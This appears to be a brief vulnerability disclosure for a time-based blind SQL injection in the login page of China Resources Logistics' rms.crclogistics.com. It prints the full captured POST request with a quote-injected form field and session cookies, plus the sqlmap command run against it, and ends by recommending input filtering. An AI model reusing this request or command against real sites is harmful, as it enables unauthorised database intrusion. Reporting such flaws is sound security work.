The background injection vulnerability of a sub-station in China Resources startup
Delayed blind Injection
Http://rms.crclogistics.com/login.aspx
China Resources Logistics
Packet Capture
POST /login.aspx HTTP/1.1Host: rms.crclogistics.comProxy-Connection: keep-aliveContent-Length: 415Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://rms.crclogistics.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://rms.crclogistics.com/login.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: _dc_gtm_UA-52741620-1=1; _ga=GA1.2.900858575.1443863057; ASP.NET_SessionId=ojetbd55mmsxou55ll2ecq55__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE5OTc4NjI1NDBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYDBQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uMgUMSW1hZ2VCdXR0b24zIMKD4P%2FerF3IdTx3RFatQBXRrcc%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBgKGmPSpBgLSwpnTCALs0bLrBgLs0fbZDALSwtXkAgLSwsGJCpCA%2BdDI1rqHP5xLLGG3ZkNWW3XR&TextBox1=123'&TextBox2=123&ImageButton2.x=72&ImageButton2.y=28
sqlmap -r bao.txt
Due to the delay of blind injection, it is too time-consuming to continue running.
Solution:Filter